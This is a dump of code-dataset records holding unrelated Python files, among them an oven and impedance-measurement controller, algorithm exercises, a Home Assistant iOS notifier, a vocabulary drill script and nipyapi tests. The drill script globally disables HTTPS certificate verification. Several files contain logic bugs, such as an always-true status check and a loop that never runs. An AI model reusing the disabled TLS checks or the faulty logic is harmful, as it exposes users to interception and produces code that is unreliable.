self.step\n\n    def run(self):\n        self.step_counter = 0\n        for step in self.TP:\n            self.lock.acquire()\n            self.step = step\n            self.lock.release()\n\n            # setting the oven\n            t_start = time.time()\n            step_time = self.step[0] * 60  # step_time in seconds\n            step_temp = float(format(float(self.step[1]) / 0.84, \".2f\"))\n            print(self.step)\n\n            self.lock.acquire()\n            self.t1 = datetime.datetime.now()\n            self.t2 = datetime.datetime.now() + datetime.timedelta(seconds=step_time)\n            self.t3 = datetime.datetime.now() + datetime.timedelta(seconds=1 * 60)\n            self.lock.release()\n\n            while self.t1 < self.t2:\n                # run time\n                t_step = time.time()\n                t_run = format(t_step - t_start, \"0.2f\")\n\n                if APP_OVEN_PRESENT:\n                    # run oven\n                    print(\"01 - Reading data from Oven...\")\n                    temp_real = 
self.OVEN.TTC_Read_PV_Temp()\n temp_set = self.OVEN.TTC_Read_SP_Temp()\n else:\n temp_set = format(1.00, \"0.2f\")\n temp_real = format(1.00, \"0.2f\")\n\n self.pid.SetPoint = step_temp\n self.pid.setKp(float(self.P))\n self.pid.setKi(float(self.I))\n self.pid.setKd(float(self.D))\n\n # read temperature sensor\n # Humidity Sensor\n # If is not OK => apply non valid temp and humidity\n print(\"02 - Reading data from Humidity Sensor...\")\n if APP_BME_280_PRESENT:\n try:\n temperature, pressure, humidity = bme280.readBME280All()\n\n # Medicine\n if (humidity == None) or (temperature == None):\n humidity = BME_280_INVALID_HUMI\n temperature = BME_280_INVALID_TEMP\n print(\"02 - Reading data from Humidity Sensor (NONE! - ERROR)...\")\n elif (type(humidity) == str) or (type(temperature) == str):\n humidity = BME_280_INVALID_HUMI\n temperature = BME_280_INVALID_TEMP\n print(\"02 - Reading data from Humidity Sensor (INVALID STRING! - ERROR)...\")\n\n except:\n humidity = BME_280_INVALID_HUMI\n temperature = BME_280_INVALID_TEMP\n print(\"02 - Reading data from Humidity Sensor (INVALID STRING! - ERROR)...\")\n\n else:\n print(\"02 - Reading data from Humidity Sensor (DISABLED)...\")\n humidity = BME_280_INVALID_HUMI\n temperature = BME_280_INVALID_TEMP\n\n HUMI_sensor = format(humidity, \"0.2f\")\n TEMP_sensor = format(temperature, \"0.2f\")\n print(\"02 - Reading data from Humidity Sensor: Temp(oC): \", TEMP_sensor)\n print(\"02 - Reading data from Humidity Sensor: Humi(%): \", HUMI_sensor)\n\n print(\"Sensor Temperature : \", str(TEMP_sensor))\n\n self.pid.update(float(TEMP_sensor))\n\n target_temperature = self.pid.output\n\n # Limit Extremes\n if target_temperature > 130:\n target_temperature = 130\n elif target_temperature < -40:\n target_temperature = -40\n else:\n target_temperature = target_temperature\n\n print(\"PID set Temperature : \", str(target_temperature))\n print(\"Chamber real Temperature : \", temp_real)\n\n self.OVEN.TTC_Set_Temp(target_temperature)\n\n if APP_NEXTION_PRESENT:\n self.Father.updateIMPTemp([temp_set, temp_real, TEMP_sensor, HUMI_sensor, t_run])\n\n self.lock.acquire()\n self.t1 = datetime.datetime.now()\n self.lock.release()\n\n DE = str(DIS.read())\n # print (DE)\n self.RE_VAL.add(DE)\n # print (RE_VAL)\n\n if \"['e\\\\x0f\\\\x1b\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n print(\"Exiting\")\n self.OVEN.TTC_OFF()\n self.RE_VAL.clear()\n DIS.write(\"page Device Select\\xff\\xff\\xff\")\n return\n\n elif \"['e\\\\x0f\\\\x1c\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n # DIS.write(\"rest\\xff\\xff\\xff\")\n self.RE_VAL.clear()\n DIS.write(\"page restart\\xff\\xff\\xff\")\n os.system(\"sudo reboot\")\n\n print(\"07 - Updating Display...\")\n\n sleep(0.5)\n\n self.lock.acquire()\n self.step_counter += 1\n self.lock.release()\n\n self.OVEN.TTC_OFF()\n\nclass MeasureThread(Thread):\n def __init__(self, num_samples, start_freq, end_freq, set_voltage, Father, RE_VAL):\n Thread.__init__(self)\n # Initialize Relay\n\n self.REL = relay.Relay_module()\n self.REL.reset()\n\n if APP_IMP_PRESENT:\n self.IMP = Impedanz_4192A_Eth.Impedance_Analyser(IMP_IP, IMP_PORT)\n self.IMP.startComm()\n\n # create file and title\n self.CF = data_storage.create_file()\n self.test_mode = \"Auto\"\n self.equipment_Info = \"TTC-4006 + IMP-4192A\"\n Driver_root = detect_file.File(folder)[1]\n start_time = str(datetime.datetime.now())\n filename = start_time.replace(\" \", \"_\").replace(\".\", \"-\").replace(\":\", \"-\")\n self.CF.folder(Driver_root, filename)\n\n self.Oven = 
getCurrentOven( )\n\n self.CurrentStep = -1\n\n self.NEXTION_NUM_SAMPLES = num_samples\n self.NEXTION_START_FREQ = start_freq\n self.NEXTION_END_FREQ = end_freq\n self.NEXTION_SET_VOLTAGE = set_voltage\n\n self.Father = Father\n self.RE_VAL = RE_VAL\n\n def run(self):\n while(1):\n T = self.Oven.getTimes()\n S = self.Oven.getStepNum()\n StepContent = self.Oven.getStep()\n if T[0] > T[2] and T[0] < T[1] and S != self.CurrentStep:\n self.CurrentStep = S\n # create folder for each step\n self.CF.folder_IMP( StepContent )\n for i in range(self.NEXTION_NUM_SAMPLES):\n # relay selection\n print('03 - Swtich Relay: %d' % i)\n self.REL.RelaySelect(i)\n sleep(RELAY_HOLDING_TIME)\n\n # create folder for each sample\n current_time = str(datetime.datetime.now())\n self.time_str = current_time.replace(\" \", \"_\").replace(\".\", \"-\").replace(\":\", \"-\")\n\n self.Father.updateIMPSweep([\"Measuring\", \" \", i])\n\n DE = str(DIS.read())\n # print (DE)\n self.RE_VAL.add(DE)\n # print (RE_VAL)\n\n if \"['e\\\\x0f\\\\x1b\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n print(\"Exiting\")\n self.Oven.OVEN.TTC_OFF()\n self.RE_VAL.clear()\n DIS.write(\"page Device Select\\xff\\xff\\xff\")\n return\n\n elif \"['e\\\\x0f\\\\x1c\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n # DIS.write(\"rest\\xff\\xff\\xff\")\n self.RE_VAL.clear()\n DIS.write(\"page restart\\xff\\xff\\xff\")\n os.system(\"sudo reboot\")\n\n print(\"07 - Updating Display...\")\n\n # creat file\n sample_time = str(datetime.datetime.now()).replace(\" \", \"_\").replace(\".\", \"-\").replace(\":\", \"-\")\n name = 'Sample' + str(i)\n locals()['v' + str(i)] = i\n PA = self.CF.step_folder(name)\n self.CF.header_imp(PA, self.time_str, self.time_str, self.equipment_Info, self.test_mode,\n self.NEXTION_START_FREQ,\n self.NEXTION_END_FREQ, self.NEXTION_SET_VOLTAGE)\n\n # run multimeter\n print(\"04- Multimeter DMM196 Reading...\")\n if APP_IMP_PRESENT:\n data = self.IMP.sweep_measure(self.NEXTION_START_FREQ, self.NEXTION_END_FREQ,\n self.NEXTION_SET_VOLTAGE)\n self.CF.content(PA, self.time_str, data)\n\n # relay reset\n print(\"06 - Swtich Relay Unselection: %d\" % i)\n self.REL.RelayDeSelect(i)\n break\n else:\n self.Father.updateIMPStatus([\"Waiting\", \" \", 0])\n\n DE = str(DIS.read())\n # print (DE)\n self.RE_VAL.add(DE)\n # print (RE_VAL)\n\n if \"['e\\\\x0f\\\\x1b\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n print(\"Exiting\")\n self.Oven.OVEN.TTC_OFF()\n self.RE_VAL.clear()\n DIS.write(\"page Device Select\\xff\\xff\\xff\")\n return\n\n elif \"['e\\\\x0f\\\\x1c\\\\x01\\\\xff\\\\xff\\\\xff']\" in self.RE_VAL:\n # DIS.write(\"rest\\xff\\xff\\xff\")\n self.RE_VAL.clear()\n DIS.write(\"page restart\\xff\\xff\\xff\")\n os.system(\"sudo reboot\")\n\n print(\"07 - Updating Display...\")\n\n print('Waiting...')\n print(T)\n print(S)\n print(StepContent)\n sleep(1)\n\ndef getCurrentOven( ):\n global curOven\n return curOven\n\n\nclass TTC_IMP_Auto:\n def main(self, num_samples, start_freq, end_freq, set_voltage, Father):\n global curOven\n\n\n # Initialize screen\n self.RE_VAL = set()\n DE = str(DIS.read())\n # print (DE)\n self.RE_VAL.add(DE)\n # print (RE_VAL)\n\n # detect file\n if APP_PEN_DRIVE:\n FILE_NAME = detect_file.File(folder)[0]\n else:\n FILE_NAME = \"/home/pi/Desktop/Temperature_profile.txt\"\n\n # Load Profile\n TP = readTempProfile(FILE_NAME)[0]\n print(TP)\n\n curOven = OvenThread(TP, Father,self.RE_VAL)\n\n m = MeasureThread(num_samples, start_freq, end_freq, set_voltage, Father, self.RE_VAL)\n\n curOven.start( )\n m.start( 
)\n\nif __name__ == \"__main__\":\n TTC = TTC_IMP_Auto()\n TTC.main(8, 5, 13000, 1.1, None)\n","sub_path":"TTC_IMP_Auto.py","file_name":"TTC_IMP_Auto.py","file_ext":"py","file_size_in_byte":12515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"107326270","text":"##testing purposes\n\nfrom app import master, data, assembler, disassembler, tracker\n\nmydata = data.DataHolder('test.torrent')\nass = assembler.Assembler(mydata)\ndis = disassembler.Disassembler(ass ,mydata)\nmypeers = tracker.GetPeers(mydata)\nmymaster = master.Master(mydata)\n\n","sub_path":"tests/set_up_cmd.py","file_name":"set_up_cmd.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"416919427","text":"# %load q05_runs/build.py\n# Default Imports\nfrom greyatomlib.python_getting_started.q01_read_data.build import read_data\ndata = read_data()\nfrom unittest import TestCase\n\n\n# Your Solution\ndef BC_runs(data):\n \n l=(data['innings'][0]['1st innings']['deliveries'])\n c=0\n for x in l:\n for y in x:\n if(x[y]['batsman'])=='BB McCullum':\n c+=(x[y]['runs']['batsman'])\n \n\n\n\n runs=c\n return(runs)\n\n\n\n\n","sub_path":"q05_runs/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"305063427","text":"class Solution_BST(object):\n def countSmaller(self, nums):\n class TreeNode:\n def __init__(self, v):\n self.val = v\n self.left = None\n self.right = None\n self.less_equal = 1\n\n def insert(node, num):\n if num <= node.val:\n node.less_equal += 1\n if not node.left:\n node.left = TreeNode(num)\n return 0\n else:\n return insert(node.left, num)\n else:\n if not node.right:\n node.right = TreeNode(num)\n return node.less_equal\n else:\n return node.less_equal + insert(node.right, num)\n\n r = [0 for _ in range(len(nums))]\n if r:\n root = TreeNode(nums[-1])\n for i in range(len(nums) - 1)[::-1]:\n r[i] = insert(root, nums[i])\n return r\n\nclass Solution_MergeSort:\n def countSmaller(self, nums):\n def sort(a):\n m = len(a) // 2\n if m:\n left, right = a[:m], a[m:]\n sort(left)\n sort(right)\n for i in range(len(a))[::-1]:\n if not right or left and left[-1][1] > right[-1][1]:\n smaller[left[-1][0]] += len(right)\n a[i] = left.pop()\n else:\n a[i] = right.pop()\n\n smaller = [0 for _ in nums]\n sort(list(enumerate(nums)))\n return smaller\n\nclass Solution_BIT:\n def countSmaller(self, nums):\n def add(bit, i, v):\n while i < len(bit):\n bit[i] += v\n i += (i & -i)\n\n def sum(bit, i):\n r = 0\n while i > 0:\n r += bit[i]\n i -= (i & -i)\n return r\n\n n = len(nums)\n bit = [0 for _ in range(n + 1)]\n idx = { v: i for i, v in enumerate(sorted(nums)) }\n print(idx)\n r = [0 for _ in range(n)]\n for i in range(n)[::-1]:\n r[i] = sum(bit, idx[nums[i]])\n add(bit, idx[nums[i]] + 1, 1)\n return r\n\nclass Solution_BinarySearch:\n def countSmaller(self, nums):\n import bisect\n r = []\n t = []\n for num in nums[::-1]:\n i = bisect.bisect_left(t, num)\n r.insert(0, i)\n bisect.insort(t, num)\n return r\n\nclass Solution_BitWiseCompare:\n def countSmaller(self, nums):\n def solve(idx, mask):\n if idx and mask:\n highGroup = []\n lowGroup = []\n for i in idx:\n if (nums[i] & mask) == (mask if mask != (1 << 31) else 0):\n result[i] += len(lowGroup)\n highGroup.append(i)\n else:\n lowGroup.append(i)\n solve(highGroup, mask >> 1)\n solve(lowGroup, mask >> 
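# --- Added cross-check: the variants above should agree on the example from
# the problem statement; the expected answer for [5, 2, 6, 1] is [2, 1, 1, 0].
for _cls in (Solution_BST, Solution_MergeSort,
             Solution_BIT, Solution_BinarySearch):
    assert _cls().countSmaller([5, 2, 6, 1]) == [2, 1, 1, 0], _cls.__name__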
1)\n\n idx = list(range(len(nums))[::-1])\n result = [0 for _ in nums]\n solve(idx, 1 << 31)\n return result\n\n\ns = Solution_BIT()\nnums = [5, 2, 6, 1]\nr = s.countSmaller(nums)\nprint(r)\n","sub_path":"leetcode/count_of_smaller_numbers_after_self.py","file_name":"count_of_smaller_numbers_after_self.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"390735649","text":"\"\"\"\niOS push notification platform for notify component.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/notify.ios/\n\"\"\"\nimport logging\nfrom datetime import datetime, timezone\nimport requests\n\nfrom homeassistant.components import ios\n\nimport homeassistant.util.dt as dt_util\n\nfrom homeassistant.components.notify import (\n ATTR_TARGET, ATTR_TITLE, ATTR_TITLE_DEFAULT, ATTR_MESSAGE,\n ATTR_DATA, BaseNotificationService)\n\n_LOGGER = logging.getLogger(__name__)\n\nPUSH_URL = \"https://ios-push.home-assistant.io/push\"\n\nDEPENDENCIES = [\"ios\"]\n\n\ndef get_service(hass, config):\n \"\"\"Get the iOS notification service.\"\"\"\n if \"notify.ios\" not in hass.config.components:\n # Need this to enable requirements checking in the app.\n hass.config.components.append(\"notify.ios\")\n\n return iOSNotificationService()\n\n\n# pylint: disable=too-few-public-methods, too-many-arguments, invalid-name\nclass iOSNotificationService(BaseNotificationService):\n \"\"\"Implement the notification service for iOS.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the service.\"\"\"\n\n @property\n def targets(self):\n \"\"\"Return a dictionary of registered targets.\"\"\"\n return ios.devices_with_push()\n\n def send_message(self, message=\"\", **kwargs):\n \"\"\"Send a message to the Lambda APNS gateway.\"\"\"\n data = {ATTR_MESSAGE: message}\n\n if kwargs.get(ATTR_TITLE) is not None:\n # Remove default title from notifications.\n if kwargs.get(ATTR_TITLE) != ATTR_TITLE_DEFAULT:\n data[ATTR_TITLE] = kwargs.get(ATTR_TITLE)\n\n targets = kwargs.get(ATTR_TARGET)\n\n if not targets:\n targets = ios.enabled_push_ids()\n\n if kwargs.get(ATTR_DATA) is not None:\n data[ATTR_DATA] = kwargs.get(ATTR_DATA)\n\n for target in targets:\n data[ATTR_TARGET] = target\n\n req = requests.post(PUSH_URL, json=data, timeout=10)\n\n if req.status_code is not 201:\n message = req.json()[\"message\"]\n if req.status_code is 429:\n _LOGGER.warning(message)\n elif req.status_code is 400 or 500:\n _LOGGER.error(message)\n\n if req.status_code in (201, 429):\n rate_limits = req.json()[\"rateLimits\"]\n resetsAt = dt_util.parse_datetime(rate_limits[\"resetsAt\"])\n resetsAtTime = resetsAt - datetime.now(timezone.utc)\n rate_limit_msg = (\"iOS push notification rate limits for %s: \"\n \"%d sent, %d allowed, %d errors, \"\n \"resets in %s\")\n _LOGGER.info(rate_limit_msg,\n ios.device_name_for_push_id(target),\n rate_limits[\"successful\"],\n rate_limits[\"maximum\"], rate_limits[\"errors\"],\n str(resetsAtTime).split(\".\")[0])\n","sub_path":"homeassistant/components/notify/ios.py","file_name":"ios.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"615980781","text":"import random\nfrom urllib.request import urlopen\nimport sys\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nword_url = \"https://learncodethehardway.org/words.txt\"\nwords = []\n\nphrases 
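# --- Added note on the notify/ios snippet above: the branch
# `elif req.status_code is 400 or 500:` is always truthy, because it parses
# as `(req.status_code is 400) or 500` and the bare 500 is truthy; identity
# checks with `is` on integers are also unreliable. A standalone demo of the
# precedence pitfall:
status = 201
print(status == 400 or 500)   # -> 500 (truthy): parses as (status == 400) or 500
print(status in (400, 500))   # -> False: the intended membership test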
= {\n \"class %%%{%%%}:\":\n \"make a clase named %%% that is a %%%\",\n \"class %%%(object):\\n\\tdef __init__(self, ***)\":\n \"class %%% has a __init__ that takes self and *** params:\",\n \"class %%%(object):\\n\\tdef ***(self, @@@)\":\n \"class %%% has a function *** that takes self and @@@ params:\",\n \"*** = %%%()\":\n \"set *** to an instance of class %%%\",\n \"***.***(@@@)\":\n \"from *** get the *** function, call it with the params self and @@@\",\n \"***.*** = '***'\":\n \"from *** get the *** attributes and set it to '***'\"\n }\n\n# do they want to drill phrases first?\n# this checks for the arugmetns in the terminal if there is 2 arguments (phython3.6 file name cass)\n# if user types in exactly \"english\" as the 2nd arugment then it will run phrase_first = true\n# this means that it will provide the phrase and user enters snippet\n# else default is user enters snippet based on phrase\nif len(sys.argv) == 2 and sys.argv[1] == 'english':\n phrase_first = True\nelse:\n phrase_first = False\n\n#load up the words form the website, and create a list of words\nfor word in urlopen(word_url).readlines():\n words.append(str(word.strip(), encoding=\"utf-8\"))\n\n# fucntion name is convert\n# this takes snippet and phrase from phrases dictonary above \n# snippet and phrase are from the function below (snippets = list(phrases.keys() and \n# phrase is frome the object of the snippet key phrase = phrases[snippet])\n\ndef convert(snippet, phrase):\n #capatalize the first letter for class names\n class_names = [w.capitalize() for w in \n random.sample(words, snippet.count(\"%%%\"))]\n # selcts a random word for otehr name that can be eitehr fucntion name or params name\n other_names = random.sample(words,snippet.count(\"***\"))\n #store valeus in array below\n results = []\n param_names = []\n\n for i in range (0, snippet.count(\"@@@\")):\n param_count = random.randint(1,3)\n param_names.append(', '.join(\n random.sample(words, param_count)\n ))\n\n for sentence in snippet, phrase:\n result = sentence[:]\n\n #replace class name placehoder with random word and store in select\n for word in class_names:\n result = result.replace(\"%%%\", word, 1)\n\n #fake other names\n for word in other_names:\n result = result.replace(\"***\", word, 1)\n \n #fake parameter lists\n for word in param_names:\n result = result.replace(\"@@@\", word, 1)\n\n results.append(result)\n\n return results\n\n#keep ging until they hit ctlr-D\ntry:\n while True:\n #from the phrases diction list all the keys\n snippets = list(phrases.keys())\n random.shuffle(snippets)\n for snippet in snippets:\n phrase = phrases[snippet]\n question, answer = convert(snippet, phrase)\n if phrase_first:\n question, answer = answer, question\n \n print(question)\n input(\">\")\n print(f\"answer: {answer} \\n\")\n \nexcept EOFError:\n print(\"\\nBYE!\")\n","sub_path":"oop_test.py","file_name":"oop_test.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"344739004","text":"#信号量\n# 信号量的本质是带计数器的锁\n#信号量和线程池的区别\n#相同点:在信号量 acquire 之后,和线程池一样 同时在执行的只能有n个\n#不同点:\n # 开的线程数不一样,线程池只开固定数量的线程,信号量有几个任务就开几个线程。\n #\n\n# 对有信号量限制的程序来说,可以同时执行很多线程吗 ?\n# 可以\n\n#实际上信号并不影响线程或者进程的并发,只是在加锁的阶段进行流量限制\n\n\n# from multiprocessing import Semaphore\n# sem = Semaphore(4) # Semaphore默认参数是1, 参数4 表示 同时只能起四个进程\n# sem.acquire()\n# print(0)\n# sem.acquire()\n# print(1)\n# sem.acquire()\n# print(2)\n# sem.acquire()\n# print(3)\n# sem.acquire() #阻塞 4 打印不出来\n# print(4)\n\n# 
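# --- Added minimal sketch (an English restatement of the commented-out demo
# above): Semaphore(n) only limits how many acquirers run concurrently; it
# does not cap how many threads or processes get created.
from threading import Semaphore, Thread
import time

def sem_worker(n, sem):
    with sem:                    # acquire on entry, release on exit
        print('worker %s inside' % n)
        time.sleep(0.1)          # at most 4 workers sit in this block at once

sem_demo = Semaphore(4)
demo_threads = [Thread(target=sem_worker, args=(i, sem_demo)) for i in range(10)]
for t in demo_threads: t.start()
for t in demo_threads: t.join()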
sem.release() #释放一把锁,4可以打印出来\n# print(4)\n\n#0\n#1\n#2\n#3\n\n################ 模拟唱吧 ################\nimport random\nimport time\nfrom multiprocessing import Semaphore\nfrom multiprocessing import Process\n\ndef sing(i, sem):\n sem.acquire()\n print('%s 进入KTV' %i)\n time.sleep(random.randint(1, 10)) # 进入KTV喝歌1到10s\n print('%s 离开KTV' %i)\n sem.release()\n\nif __name__ == '__main__':\n sem = Semaphore(4) # 只能有四个人同时进入KTV\n for i in range(20): # 有20个人想进 KTV 唱歌\n Process(target=sing, args=(i, sem)).start()\n\n\n# from threading import Thread\n# from threading import Semaphore\n# import time\n# import random\n#\n# def func(n, scm):\n# scm.acquire()\n# print('thead -%s start' %n)\n# time.sleep(random.random())\n# print('thread -%s done' %n)\n# scm.release()\n#\n# scm = Semaphore(5) # 一把锁有五把钥匙,同一时间只能有5个线程在执行\n# for i in range(20):\n# Thread(target=func, args=(i, scm)).start()\n","sub_path":"process/process_single.py","file_name":"process_single.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"496533996","text":"\"\"\"MyCRM URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom crm import views\n\nurlpatterns = [\n url(r'^$', views.dashboard, name=\"sales_dashboard\"),\n url(r'^stu_enrollment/$', views.stu_enrollment, name=\"stu_enrollment\"),\n url(r'^enrollment/(?P\\d+)/$', views.enrollment, name=\"enrollment\"),\n url(r'^enrollment/(?P\\d+)/file_upload/$',\n views.enrollment_file_upload, name=\"enrollment_file_upload\"),\n url(r'^stu_enrollment/(?P\\d+)/contract_audit/$',\n views.enrollment_contract_audit, name=\"enrollment_contract_audit\"),\n]\n","sub_path":"SelfLearn/框架(Django)/181214_CRM/MyCRM/crm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"11177560","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 22 21:14:58 2019\r\n\r\n@author: chakradhara rao\r\n\"\"\"\r\n'''\r\nThis problem was asked by Google.\r\n\r\nGiven the root to a binary tree, implement serialize(root), which serializes the tree into a string, and deserialize(s), which deserializes the string back into the tree.\r\n\r\nFor example, given the following Node class\r\n\r\nclass Node:\r\n def __init__(self, val, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nThe following test should pass:\r\n\r\nnode = Node('root', Node('left', Node('left.left')), Node('right'))\r\nassert deserialize(serialize(node)).left.left.val == 'left.left' '''\r\nclass Node:\r\n def __init__(self, val, left=None, right=None):\r\n self.d = val\r\n self.l = left\r\n self.r = right\r\n def __repr__(self):\r\n return '{name:'+str(self.d)+ '}'\r\n def __str__(self):\r\n return '{name:'+str(self.d)+'}'\r\nclass bt:\r\n def __init__(self,n):\r\n self.r=n\r\n self.c=1\r\n 
self.l=[self.r]\r\n def insert(self,n):\r\n n=Node(n)\r\n a=self.l[0]\r\n if a.l==None:\r\n a.l=n\r\n self.c+=1\r\n else:\r\n a.r=n\r\n self.c+=1\r\n del self.l[0]\r\n self.l.append(n)\r\ndef serialize(n):\r\n l=[n]\r\n if n.l!=None:\r\n l.append(serialize(n.l))\r\n if n.r!=None:\r\n l.append(serialize(n.r))\r\n return l\r\ndef deserialize(l):\r\n x=bt(l[0])\r\n for a in l[1:]:\r\n x.insert(a)\r\n return x.r\r\nnode = Node('root', Node('left', Node('left.left')), Node('right'))\r\nprint(serialize(node))\r\nassert deserialize(serialize(node)).l.l.d == 'left.left'","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168075537","text":"from src.homework.homework9.die import Die\n#write import statement for Die class\n\n'''\nCreate a Player class.\n\n'''\n\n\nclass Player:\n\n def __init__(self):\n '''\n Constructor method creates two Die attributes die1 and die2\n '''\n self.die1 = Die()\n self.die2 = Die()\n\n def roll_doubles(self):\n '''\n The roll_doubles method that will roll die1 and die2 (attributes from constructor method),\n display rolled values,and continue iterating until a double is rolled.\n '''\n value1 = 0\n value2 = 0\n\n while value1 != value2:\n value1 = self.die1.roll()\n print(\"This is value 1: \", value1)\n value2 = self.die2.roll()\n print(\"This is value 2: \", value2)\n","sub_path":"src/homework/homework9/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"630451683","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Tests for `nipyapi` package.\"\"\"\n\nimport pytest\nfrom tests import conftest\nfrom nipyapi import canvas, nifi\nfrom nipyapi.nifi import ProcessGroupFlowEntity, ProcessGroupEntity\nfrom nipyapi.nifi import ProcessorTypesEntity, DocumentedTypeDTO\nfrom nipyapi.nifi.rest import ApiException\n\n\ndef test_get_root_pg_id():\n r = canvas.get_root_pg_id()\n assert isinstance(r, str)\n\n\ndef test_get_process_group_status(regress):\n r = canvas.get_process_group_status(pg_id='root', detail='names')\n assert isinstance(r, dict)\n r = canvas.get_process_group_status('root', 'all')\n assert isinstance(r, ProcessGroupEntity)\n # We rely on this int for testing if a PG is running or not\n assert isinstance(r.running_count, int)\n with pytest.raises(AssertionError):\n _ = canvas.get_process_group_status('root','invalid')\n\n\ndef test_get_flow():\n r = canvas.get_flow('root')\n assert isinstance(r, ProcessGroupFlowEntity)\n assert r.process_group_flow.breadcrumb.breadcrumb.name == 'NiFi Flow'\n with pytest.raises(ValueError):\n _ = canvas.get_flow('definitelyNotAPG')\n\n\ndef test_recurse_flow(fix_pg, regress):\n _ = fix_pg.generate()\n r = canvas.recurse_flow('root')\n assert isinstance(r, ProcessGroupFlowEntity)\n assert r.process_group_flow.breadcrumb.breadcrumb.name == 'NiFi Flow'\n assert isinstance(\n r.process_group_flow.flow.process_groups[0].nipyapi_extended,\n ProcessGroupFlowEntity\n )\n\n\ndef test_list_all_process_groups(fix_pg, regress):\n _ = fix_pg.generate()\n r = canvas.list_all_process_groups()\n assert isinstance(r, list)\n for pg in r:\n assert isinstance(pg, ProcessGroupEntity)\n\n\ndef test_create_process_group(regress):\n r = canvas.create_process_group(\n canvas.get_process_group(canvas.get_root_pg_id(), 'id'),\n conftest.test_pg_name,\n location=(400.0,400.0)\n )\n assert 
r.component.name == conftest.test_pg_name\n assert r.position.x == r.position.y == 400\n assert r.component.parent_group_id == canvas.get_root_pg_id()\n assert isinstance(r, nifi.ProcessGroupEntity)\n with pytest.raises(ApiException):\n parent_pg = canvas.get_process_group('NiFi Flow')\n parent_pg.id = 'invalid'\n _ = canvas.create_process_group(\n parent_pg,\n 'irrelevant',\n (0, 0)\n )\n\n\ndef test_get_process_group(fix_pg, regress):\n with pytest.raises(AssertionError):\n _ = canvas.get_process_group('nipyapi_test', 'invalid')\n f_pg = fix_pg.generate()\n pg1 = canvas.get_process_group(f_pg.id, 'id')\n assert isinstance(pg1, ProcessGroupEntity)\n duplicate_pg = fix_pg.generate()\n pg2 = canvas.get_process_group(duplicate_pg.id, 'id')\n assert pg2.id != pg1.id\n pg_list = canvas.get_process_group(f_pg.status.name)\n assert isinstance(pg_list, list)\n # the two duplicates, and root = 3\n assert len(pg_list) == 3\n\n\ndef test_delete_process_group(fix_pg, regress, fix_proc):\n # Delete stopped PG\n f_pg1 = fix_pg.generate()\n r1 = canvas.delete_process_group(f_pg1)\n assert r1.id == f_pg1.id\n assert r1.status is None\n # Test deleting a running PG\n pg_2 = fix_pg.generate()\n _ = fix_proc.generate(parent_pg=pg_2)\n canvas.schedule_process_group(pg_2.id, True)\n with pytest.raises(ValueError):\n _ = canvas.delete_process_group(pg_2)\n # Once more with feeling\n r2 = canvas.delete_process_group(\n pg_2,\n force=True\n )\n assert r2.status is None\n\n\ndef test_schedule_process_group(fix_proc, fix_pg):\n f_pg = fix_pg.generate()\n _ = fix_proc.generate(parent_pg=f_pg)\n r1 = canvas.schedule_process_group(\n f_pg.id,\n True\n )\n status = canvas.get_process_group(f_pg.id, 'id')\n assert r1 is True\n assert status.running_count == 1\n r2= canvas.schedule_process_group(\n f_pg.id,\n False\n )\n assert r2 is True\n status = canvas.get_process_group(f_pg.id, 'id')\n assert status.running_count == 0\n assert status.stopped_count == 1\n with pytest.raises(AssertionError):\n _ = canvas.schedule_process_group(\n f_pg.id,\n 'BANANA'\n )\n\n\ndef test_list_all_processor_types(regress):\n r = canvas.list_all_processor_types()\n assert isinstance(r, ProcessorTypesEntity)\n assert len(r.processor_types) > 1\n\n\ndef test_get_processor_type(regress):\n r1 = canvas.get_processor_type('twitter')\n assert r1.type == 'org.apache.nifi.processors.twitter.GetTwitter'\n assert isinstance(r1, DocumentedTypeDTO)\n r2 = canvas.get_processor_type(\"syslog\", 'tag')\n assert isinstance(r2, list)\n r3 = canvas.get_processor_type('standard')\n assert isinstance(r3, list)\n assert len(r3) > 10\n\n\ndef test_create_processor(fix_pg, regress):\n 